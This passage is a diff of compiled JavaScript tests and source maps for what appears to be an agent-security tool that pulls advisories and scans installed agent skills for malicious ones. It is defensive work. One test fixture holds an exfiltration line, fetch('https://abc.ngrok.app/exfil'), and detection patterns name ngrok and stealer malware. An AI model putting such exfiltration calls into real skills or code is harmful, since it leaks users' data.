60
|
+
};
|
|
61
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
62
|
+
const result = await client.pullAdvisories('2026-05-12T00:00:00Z');
|
|
63
|
+
strict_1.default.equal(result?.length, 1);
|
|
64
|
+
strict_1.default.equal(result?.[0].id, 'AGS-2026-1');
|
|
65
|
+
strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/advisories\?since=/);
|
|
66
|
+
});
|
|
67
|
+
(0, node_test_1.it)('pullAdvisories returns null on 404 (older Cloud)', async () => {
|
|
68
|
+
nextResponse = { status: 404, body: { success: false, error: { message: 'Not found' } } };
|
|
69
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
70
|
+
const result = await client.pullAdvisories();
|
|
71
|
+
strict_1.default.equal(result, null);
|
|
72
|
+
});
|
|
73
|
+
(0, node_test_1.it)('pullAdvisories throws on other errors', async () => {
|
|
74
|
+
nextResponse = { status: 500, body: { success: false, error: { message: 'boom' } } };
|
|
75
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
76
|
+
await strict_1.default.rejects(() => client.pullAdvisories(), (err) => err instanceof client_js_1.CloudRequestError && err.status === 500);
|
|
77
|
+
});
|
|
78
|
+
(0, node_test_1.it)('reportSelfCheck POSTs the advisoryId + matches', async () => {
|
|
79
|
+
nextResponse = { status: 200, body: { success: true, data: {} } };
|
|
80
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
81
|
+
await client.reportSelfCheck('AGS-2026-1', [{ path: '/tmp/skills/bad', matchedBy: 'namePattern' }], { elapsedMs: 12 });
|
|
82
|
+
strict_1.default.equal(lastRequest.method, 'POST');
|
|
83
|
+
strict_1.default.match(lastRequest.url, /\/api\/v1\/feed\/self-check-report$/);
|
|
84
|
+
strict_1.default.equal(lastRequest.body.advisoryId, 'AGS-2026-1');
|
|
85
|
+
strict_1.default.equal(lastRequest.body.matches.length, 1);
|
|
86
|
+
});
|
|
87
|
+
(0, node_test_1.it)('reportSelfCheck swallows 404 silently', async () => {
|
|
88
|
+
nextResponse = { status: 404, body: { success: false, error: { message: 'no sink yet' } } };
|
|
89
|
+
const client = new client_js_1.AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
|
|
90
|
+
await strict_1.default.doesNotReject(() => client.reportSelfCheck('AGS-x', [{ path: '/tmp/x', matchedBy: 'sha256' }]));
|
|
91
|
+
});
|
|
92
|
+
});
|
|
93
|
+
//# sourceMappingURL=feed-cloud.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-cloud.test.js","sourceRoot":"","sources":["../../src/tests/feed-cloud.test.ts"],"names":[],"mappings":"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"}
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-selfcheck.test.d.ts","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":""}
|
|
@@ -0,0 +1,118 @@
|
|
|
1
|
+
"use strict";
|
|
2
|
+
var __importDefault = (this && this.__importDefault) || function (mod) {
|
|
3
|
+
return (mod && mod.__esModule) ? mod : { "default": mod };
|
|
4
|
+
};
|
|
5
|
+
Object.defineProperty(exports, "__esModule", { value: true });
|
|
6
|
+
const node_test_1 = require("node:test");
|
|
7
|
+
const strict_1 = __importDefault(require("node:assert/strict"));
|
|
8
|
+
const node_fs_1 = require("node:fs");
|
|
9
|
+
const node_os_1 = require("node:os");
|
|
10
|
+
const node_path_1 = require("node:path");
|
|
11
|
+
const node_crypto_1 = require("node:crypto");
|
|
12
|
+
const selfcheck_js_1 = require("../feed/selfcheck.js");
|
|
13
|
+
function makeSkillDir(parent, name, body) {
|
|
14
|
+
const dir = (0, node_path_1.join)(parent, name);
|
|
15
|
+
(0, node_fs_1.mkdirSync)(dir, { recursive: true });
|
|
16
|
+
(0, node_fs_1.writeFileSync)((0, node_path_1.join)(dir, 'SKILL.md'), body, 'utf8');
|
|
17
|
+
return dir;
|
|
18
|
+
}
|
|
19
|
+
function makeAdvisory(partial) {
|
|
20
|
+
return {
|
|
21
|
+
id: 'AGS-test-1',
|
|
22
|
+
ecosystem: 'skill',
|
|
23
|
+
severity: 'high',
|
|
24
|
+
summary: 'test',
|
|
25
|
+
detailsMd: '',
|
|
26
|
+
affected: [],
|
|
27
|
+
publishedAt: new Date().toISOString(),
|
|
28
|
+
...partial,
|
|
29
|
+
};
|
|
30
|
+
}
|
|
31
|
+
(0, node_test_1.describe)('feed/selfcheck', () => {
|
|
32
|
+
(0, node_test_1.it)('globMatch handles literal names', () => {
|
|
33
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'slack-webhook'), true);
|
|
34
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook', 'discord-webhook'), false);
|
|
35
|
+
});
|
|
36
|
+
(0, node_test_1.it)('globMatch supports * wildcards', () => {
|
|
37
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook-malicious'), true);
|
|
38
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('slack-webhook-*', 'slack-webhook'), false);
|
|
39
|
+
strict_1.default.equal((0, selfcheck_js_1.globMatch)('*-stealer-*', 'amos-stealer-v2'), true);
|
|
40
|
+
});
|
|
41
|
+
(0, node_test_1.it)('matches a skill by name pattern', async () => {
|
|
42
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
43
|
+
makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\nbody');
|
|
44
|
+
makeSkillDir(root, 'unrelated', '---\nname: y\n---\nbody');
|
|
45
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'slack-webhook-*' }] }), { skillRoots: [root] });
|
|
46
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
47
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'namePattern');
|
|
48
|
+
strict_1.default.match(result.matchedArtifacts[0].path, /slack-webhook-evil$/);
|
|
49
|
+
});
|
|
50
|
+
(0, node_test_1.it)('matches a skill by SKILL.md body regex', async () => {
|
|
51
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
52
|
+
makeSkillDir(root, 'innocent', '---\nname: ok\n---\nperfectly normal');
|
|
53
|
+
makeSkillDir(root, 'leaky', '---\nname: bad\n---\nfetch("https://abc.ngrok.app/exfil")');
|
|
54
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ bodyRegex: 'ngrok\\.app' }] }), { skillRoots: [root] });
|
|
55
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
56
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'bodyRegex');
|
|
57
|
+
});
|
|
58
|
+
(0, node_test_1.it)('returns no matches when nothing in the local env corresponds', async () => {
|
|
59
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
60
|
+
makeSkillDir(root, 'foo', '---\nname: foo\n---\n');
|
|
61
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: 'never-installed-*' }] }), { skillRoots: [root] });
|
|
62
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
63
|
+
strict_1.default.deepEqual(result.warnings, []);
|
|
64
|
+
});
|
|
65
|
+
(0, node_test_1.it)('treats withdrawn advisories as no-op', async () => {
|
|
66
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
67
|
+
makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\n');
|
|
68
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({
|
|
69
|
+
affected: [{ namePattern: 'slack-webhook-*' }],
|
|
70
|
+
withdrawnAt: new Date().toISOString(),
|
|
71
|
+
}), { skillRoots: [root] });
|
|
72
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
73
|
+
});
|
|
74
|
+
(0, node_test_1.it)('warns when the advisory targets an unsupported ecosystem', async () => {
|
|
75
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ ecosystem: 'mcp_server', affected: [{ namePattern: 'whatever' }] }), { skillRoots: [] });
|
|
76
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
77
|
+
strict_1.default.ok(result.warnings.some((w) => w.includes('mcp_server')));
|
|
78
|
+
});
|
|
79
|
+
(0, node_test_1.it)('ignores roots that do not exist', async () => {
|
|
80
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ namePattern: '*' }] }), { skillRoots: ['/definitely/not/a/real/path'] });
|
|
81
|
+
strict_1.default.equal(result.matchedArtifacts.length, 0);
|
|
82
|
+
strict_1.default.deepEqual(result.warnings, []);
|
|
83
|
+
});
|
|
84
|
+
(0, node_test_1.it)('matches sha256 against the SKILL.md content (canonical hash input)', async () => {
|
|
85
|
+
const root = (0, node_fs_1.mkdtempSync)((0, node_path_1.join)((0, node_os_1.tmpdir)(), 'ag-selfcheck-'));
|
|
86
|
+
const body = '---\nname: rugpull\n---\nmalicious payload';
|
|
87
|
+
makeSkillDir(root, 'rugged', body);
|
|
88
|
+
const expected = (0, node_crypto_1.createHash)('sha256').update(body).digest('hex');
|
|
89
|
+
const result = await (0, selfcheck_js_1.runSelfCheckForAdvisory)(makeAdvisory({ affected: [{ sha256: expected }] }), { skillRoots: [root] });
|
|
90
|
+
strict_1.default.equal(result.matchedArtifacts.length, 1);
|
|
91
|
+
strict_1.default.equal(result.matchedArtifacts[0].matchedBy, 'sha256');
|
|
92
|
+
strict_1.default.equal(result.matchedArtifacts[0].hash, expected);
|
|
93
|
+
});
|
|
94
|
+
});
|
|
95
|
+
(0, node_test_1.describe)('safeRegexTest', () => {
|
|
96
|
+
(0, node_test_1.it)('matches a normal pattern', () => {
|
|
97
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'fetch https://x.ngrok.app/x'), true);
|
|
98
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('ngrok\\.app', 'no match here'), false);
|
|
99
|
+
});
|
|
100
|
+
(0, node_test_1.it)('rejects empty / non-string patterns', () => {
|
|
101
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('', 'anything'), false);
|
|
102
|
+
// @ts-expect-error — intentionally passing wrong type
|
|
103
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(null, 'anything'), false);
|
|
104
|
+
});
|
|
105
|
+
(0, node_test_1.it)('rejects oversized patterns', () => {
|
|
106
|
+
const huge = '(' + 'a'.repeat(300) + ')';
|
|
107
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)(huge, 'aaaa'), false);
|
|
108
|
+
});
|
|
109
|
+
(0, node_test_1.it)('rejects nested-quantifier catastrophic patterns (ReDoS)', () => {
|
|
110
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a+)+', 'aaaa'), false);
|
|
111
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(.+)+', 'xxxx'), false);
|
|
112
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(a*)*', 'aaaa'), false);
|
|
113
|
+
});
|
|
114
|
+
(0, node_test_1.it)('swallows compile errors silently', () => {
|
|
115
|
+
strict_1.default.equal((0, selfcheck_js_1.safeRegexTest)('(unclosed', 'aaaa'), false);
|
|
116
|
+
});
|
|
117
|
+
});
|
|
118
|
+
//# sourceMappingURL=feed-selfcheck.test.js.map
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
{"version":3,"file":"feed-selfcheck.test.js","sourceRoot":"","sources":["../../src/tests/feed-selfcheck.test.ts"],"names":[],"mappings":"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